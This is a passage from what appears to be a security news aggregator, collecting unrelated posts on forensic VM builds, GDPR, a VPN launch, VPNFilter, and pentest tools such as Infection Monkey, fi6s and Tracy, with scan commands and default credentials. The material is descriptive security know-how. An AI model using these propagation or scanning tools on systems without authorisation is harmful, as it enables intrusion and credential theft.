that it will not interfere with investigative workflows, all settings related to privacy, Windows telemetry, and error reporting should minimize collection. Building Darksurgeon Build Process Darksurgeon is built using the HashiCorp application packer. The total build time for a new instance of Darksurgeon is around 2–3 hours. Packer creates a new virtual machine using theDarksurgeon JSON file and your hypervisor of choice (e.g. Hyper-V, Virtualbox, VMWare). The answers.iso file is mounted inside theDarksurgeon VM along with the Windows ISO. The answers.iso file contains the unattend.xml needed for a touchless installation of windows, as well as a powershell script to configure Windows Remote Management (winrm). Packer connects to the Darksurgeon VM using WinRM and copies over all files in the helper-scripts and configuration-files directory to the host. Packer performs serial installations of each of the configured powershell scripts, performing occasional reboots as needed. When complete, packer performs a sysprep, shuts down the virtual machine, and creates a vagrant box file. Additional outputs may be specified in the post-processors section of the JSON file. Setup Note: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMWare support are forthcoming. Install packer, vagrant, and your preferred hypervisor on your host. Download the repository contents to your host. Download a Windows 10 Enterprise Evaluation ISO (1803). Move the ISO file to your local Darksurgeon repository. Update Darksurgeon.json with the ISO SHA1 hash and file name. (Optional) Execute the powershell script New-Darksurgeon.ps1 to generate a new answers.iso file. There is an answers ISO file included in the repository but you may re-build this if you don’t trust it, or you would like to modify the unattend files: powershell.exe New-DARKSURGEONISO.ps1 Build the recipe using packer: packer build -only=[hyperv-iso|vmware|virtualbox] .\DARKSURGEON.json Using Darksurgeon Note: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMWare support are forthcoming. Once Darksurgeon has successfully built, you’ll receive an output vagrant box file. The box file contains the virtual machine image and vagrant metadata, allowing you to quickly spin up a virtual machine as needed. Install vagrant and your preferred hypervisor on your host. Navigate to the Darksurgeon repository (or the location where you’ve saved the Darksurgeon box file). Perform a vagrant up: vagrant up Vagrant will now extract the virtual machine image from the box file, read the metadata, and create a new VM for you. Want to kill this VM and get a new one? Easy, just perform the following: vagrant destroy && vagrant up Once the Darksurgeon virtual machine is running, you can login using one of the two local accounts: Note: These are default accounts with default credentials. You may want to consider changing the credentials in your packer build. Administrator Account: Username: Darksurgeon Password: darksurgeon Local User Account: Username: Unprivileged Password: unprivileged If you’d rather not use vagrant, you can either import the VM image manually, or look at one of the many other post-processor options provided by packer. Download: DARKSURGEON-master.zip Sources: https://github.com/cryps1s/DARKSURGEON https://darksurgeon.io

Noul Regulament UE privind prelucrarea datelor cu caracter personal și libera circulație a acestor date a intrat în vigoare de vineri în toate statele Uniunii Europene, inclusiv în România. Noul regulament obligă companiile care îşi desfăşoară activitatea în Uniunea Europeană să ceară și să primească acordul utilizatorilor pentru a le colecta și prelucra datele. În cazul unei scurgeri de informaţii, companiile sunt obligate să îşi anunţe utilizatorii/ clienţii afectaţi şi autorităţile în maxim 72 de ore. Nerespectarea lui poate duce la amendarea unei companii cu până la 20 de milioane de euro sau 4% din cifra de afaceri. În România, însă, legislația necesară a fost adoptată abia săptămâna aceasta de Parlament și se află la promulgare. Proiectul a stat și două zile la secretariatele generale ale celor două camere parlamentare, în vederea unei eventuale exercitări a dreptului de sesizare a Curții Constituționale. Prin urmare, cel mai probabil, chiar în ziua intrării în vigoare a GDPR, legea poate fi trimisă spre promulgare președintelui. Dacă va fi promulgată de Klaus Iohannis, legea va intra în vigoare la 3 zile de la publicarea în Monitorul Oficial. Via b1.ro

PornHub wants you to keep your porn viewing activities private, and it is ready to help you out with its all-new VPN service. Yes, you heard that right. Adult entertainment giant PornHub has launched its very own VPN service today with "free and unlimited bandwidth" to help you keep prying eyes away from your browsing activity. Dubbed VPNhub, the VPN service by PornHub is available for both mobile as well as desktop platform, including Android, iOS, MacOS, and Windows. VPN, or Virtual Private Network, allows users to transmit data anonymously, avoids ISP-level website blocking or tracking and keeps your browsing activity private by encrypting your data, even when you are on public Wi-Fi connections. VPNhub promises never to store, collect, sell, or share your personal information with any third parties for their marketing, advertising or research purposes. However, in its privacy policy under the heading, "How We Use Your Information," the company says it can sell "aggregate or non-personally identifiable information with non-affiliated third parties for advertising, marketing or research purposes." Since some government, including that of United Kingdom, are regulating adult content online, launching a VPN service by Pornhub makes sense. VPNhub is available in countries across the globe except for Burma/Myanmar, Cuba, Iran, North Korea, Sudan, and Syria, due to the ban imposed by the U.S. government. While mobile users (both iOS and Android) can download and use the VPNhub app for free, desktop users (MacOS and Windows) have to purchase a premium account. You can also upgrade your free account to a premium subscription for $13 a month or $90 for a full year, which eliminates ads, provides faster connection speeds, and opens up "servers from a wide range of countries." You can give premium VPNhub a try by using its use 7-day free trial. Via thehackernews.com

Infection Monkey Data center Security Testing Tool Welcome to the Infection Monkey! The Infection Monkey is an open source security tool for testing a data center's resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server. The Infection Monkey is comprised of two parts: Monkey - A tool which infects other machines and propagates to them Monkey Island - A dedicated server to control and visualize the Infection Monkey's progress inside the data center To read more about the Monkey, visit http://infectionmonkey.com Main Features The Infection Monkey uses the following techniques and exploits to propagate to other machines. Multiple propagation techniques: Predefined passwords Common logical exploits Password stealing using Mimikatz Multiple exploit methods: SSH SMB RDP WMI Shellshock Conficker SambaCry Elastic Search (CVE-2015-1427) Setup Check out the Setup page in the Wiki or a quick getting started guide. Building the Monkey from source If you want to build the monkey from source, see Setup and follow the instructions at the readme files under infection_monkey and monkey_island. Download: monkey-develop.zip or: git clone https://github.com/guardicore/monkey.git Source

Anon — A UNIX Command To Anonymise Data Anon is a tool for taking delimited files and anonymising or transforming columns until the output is useful for applications where sensitive information cannot be exposed. Installation Releases of Anon are available as pre-compiled static binaries on the corresponding GitHub release. Simply download the appropriate build for your machine and make sure it's in your PATH (or use it directly). Usage anon [--config <path to config file, default is ./config.json>] [--output <path to output to, default is STDOUT>] Anon is designed to take input from STDIN and by default will output the anonymised file to STDOUT: anon < some_file.csv > some_file_anonymised.csv Configuration In order to be useful, Anon needs to be told what you want to do to each column of the CSV. The config is defined as a JSON file (defaults to a file called config.json in the current directory): { "csv": { "delimiter": "," }, // Optionally define a number of rows to randomly sample down to. // To do it, it will hash (using FNV-1 32 bits) the column with the ID // in it and will mod the result by the value specified to decide if the // row is included or not -> include = hash(idColumn) % mod == 0 "sampling": { // Number used to mod the hash of the id and determine if the row // has to be included in the sample or not "mod": 30000 // Specify in which a column a unique ID exists on which the sampling can // be performed. Indices are 0 based, so this would sample on the first // column. "idColumn": 0 }, // An array of actions to take on each column - indices are 0 based, so index // 0 in this array corresponds to column 1, and so on. // // There must be an action for every column in the CSV. "actions": [ { // The no-op, leaves the input unchanged. "name": "nothing" }, { // Takes a UK format postcode (eg. W1W 8BE) and just keeps the outcode // (eg. W1W). "name": "outcode" }, { // Hash (SHA1) the input. "name": "hash", // Optional salt that will be appened to the input. // If not defined, a random salt will be generated "salt": "salt" }, { // Given a date, just keep the year. "name": "year", "dateConfig": { // Define the format of the input date here. "format": "YYYYmmmdd" } }, { // Summarise a range of values. "name": "range", "rangeConfig": { "ranges": [ // For example, this will take values between 0 and 100, and convert // them to the string "0-100". // You can use one of (gt, gte) and (lt, lte) but not both at the // same time. // You also need to define at least one of (gt, gte, lt, lte). { "gte": 0, "lt": 100, "output": "0-100" } ] } } ] } How to contribute Any contribution is welcome, raise a bug (and fix it! :-)) request or add a new feature... Don't be shy and raise a pull request, anything on the following topics will be very welcome: New actions to anonymise data New input formats (JSON?) Bug fixes You can also take a look at the issues and pick the one you like better. If you are going to contribute, we ask you to do the following: Use gofmt to format your code Check your code with go vet, gocyclo, golint Cover the logic with enough tests Download: anon-master.zip or: git clone https://github.com/intenthq/anon.git Source

fi6s: Fast IPv6 scanner fi6s is a IPv6 port scanner designed to be fast. This is achieved by sending and processing raw packets asynchronously. The design and goal is pretty similar to Masscan, though it is not as full-featured yet. Building Building should be fairly easy on up-to-date distros. On Ubuntu 16.04 (xenial) it looks like this: # apt install gcc make git libpcap-dev $ git clone https://github.com/sfan5/fi6s.git $ cd fi6s $ make BUILD_TYPE=release The scanner executable will be ready in at ./fi6s. Note that fi6s is developed solely on Linux, thus it probably won't compile on non-Linux OSs (notably Windows). Usage: Usage is pretty easy, fi6s will try to auto-detect the dirty technical details (source/dest MAC, source IP). # ./fi6s -p 80,8000-8100 2001:db8::/120 This example will: scan the 2001:db8::/120 subnet (256 addresses in total) scans port 80 and ports 8000 to 8100 (102 ports in total) output scan results to stdout in the "list" format There are more different ways of specifying an address range to scan, if you aren't sure what's about to happen invoke fi6s with --echo-hosts and it will print every host that would've been scanned. For advanced features please consult the output of ./fi6s -h. Grabbing banners Since fi6s has its own TCP stack, the OS stack needs to disabled to avoid interference with banner grabbing (RST packets). This is most easily done using ip6tables and a constant --source-port. Banner grabbing is then enabled by passing --banners: # ip6tables -A INPUT -p tcp -m tcp --dport 12345 -j DROP # ./fi6s -p 22 --banners --source-port 12345 2001:db8::/120 Download: fi6s-master.zip or: git clone https://github.com/sfan5/fi6s.git Source

Tracy A pentesting tool designed to assist with finding all sinks and sources of a web application and display these results in a digestible manner. tracy should be used during the mapping-the-application phase of the pentest to identify sources of input and their corresponding outputs. tracy can use this data to intelligently find vulnerable instances of XSS, especially with web applications that use lots of JavaScript. tracy is a browser extension and light-weight HTTP proxy that records all user input to a web application and monitors any time those inputs are output, for example in a DOM write, server response, or call to eval. For guides and reference materials about tracy, see the documentation. Installation It is strongly recommended that you use a released version. Release binaries are available on the releases page. Download the appropriate release binary and run it: # Run the proxy server and the tracer API. Pick the binary that works for your host. $ ./tracy-linux-amd64 Then, install the browser extension with Firefox or Chrome using one of the following links: firefox chrome Once tracy is running and the plugin is installed, install the certificate into your browser's certificate store(the certifcate is located in the .tracy folder in the home directory) and configure your browser to use the proxy(the default proxy address is localhost on port 7777) Note: The tracy binary and browser extension work together. Running one without the other will result in unexpected behavior. Download: tracy-master.zip or git clone https://github.com/nccgroup/tracy.git Source

Shortly after Cisco's released its early report on a large-scale hacking campaign that infected over half a million routers and network storage devices worldwide, the United States government announced the takedown of a key internet domain used for the attack. Yesterday we reported about a piece of highly sophisticated IoT botnet malware that infected over 500,000 devices in 54 countries and likely been designed by Russia-baked state-sponsored group in a possible effort to cause havoc in Ukraine, according to an early report published by Cisco's Talos cyber intelligence unit on Wednesday. Dubbed VPNFilter by the Talos researchers, the malware is a multi-stage, modular platform that targets small and home offices (SOHO) routers and storage devices from Linksys, MikroTik, NETGEAR, and TP-Link, as well as network-access storage (NAS) devices. Meanwhile, the court documents unsealed in Pittsburgh on the same day indicate that the FBI has seized a key web domain communicating with a massive global botnet of hundreds of thousands of infected SOHO routers and other NAS devices. The court documents said the hacking group behind the massive malware campaign is Fancy Bear, a Russian government-aligned hacking group also known as APT28, Sofacy, X-agent, Sednit, Sandworm, and Pawn Storm. The hacking group has been in operation since at least 2007 and has been credited with a long list of attacks over the past years, including the 2016 hack of the Democratic National Committee (DNC) and Clinton Campaign to influence the U.S. presidential election. Among other, Talos researchers also found evidence that the VPNFilter source code share code with versions of BlackEnergy—the malware responsible for multiple large-scale attacks targeting devices in Ukraine that the U.S. government has attributed to Russia. VPNFilter has been designed in a way that it could be used to secretly conduct surveillance on its targets and gather intelligence, interfere with internet communications, monitor industrial control or SCADA systems, such as those used in electric grids, other infrastructure and factories, as well as conduct destructive cyber attack operations. The seizure of the domain that is part of VPNFilter's command-and-control infrastructure allows the FBI to redirect attempts by stage one of the malware (in an attempt to reinfect the device) to an FBI-controlled server, which will capture the IP address of infected devices and pass on to authorities around the globe who can remove the malware. Users of SOHO and NAS devices that are infected with VPNFilter are advised to reboot their devices as soon as possible, which eliminates the non-persistent second stage malware, causing the persistent first-stage malware on their infected device to call out for instructions. Since VPNFilter does not exploit any zero-day vulnerability to infect its victims and instead searches for devices still exposed to known vulnerabilities or having default credentials, users are strongly recommended to change default credentials for their devices to prevent against the malware. Moreover, always put your routers behind a firewall, and turn off remote administration until and unless you really need it. If your router is by default vulnerable and can't be updated, it is time you buy a new one. You need to be more vigilant about the security of your smart IoT devices. Via thehackernews.com

When it comes to the security of RDP hosts, experience shows that many organizations rarely replace the default self-signed certificates with certificates signed by their corporate CA. This obviously leaves them vulnerable to Man-in-the-Middle attacks. However, until now no open source proof-of-concept exploit is available to the IT security community, despite the specifications of RDP being freely available. Since many administrators often perform tasks on critical servers such as the domain controller via RDP, usually with highly privileged accounts, RDP is a worthwhile target of potential adversaries. In this talk, we want to analyze the implementation of the relevant parts of RDP in detail and show how to develop a tool that can extract credentials in clear text if the user is careless enough to ignore SSL warnings. The intended audience is system administrators, penetration testers and security enthusiasts. https://www.hacktivity.com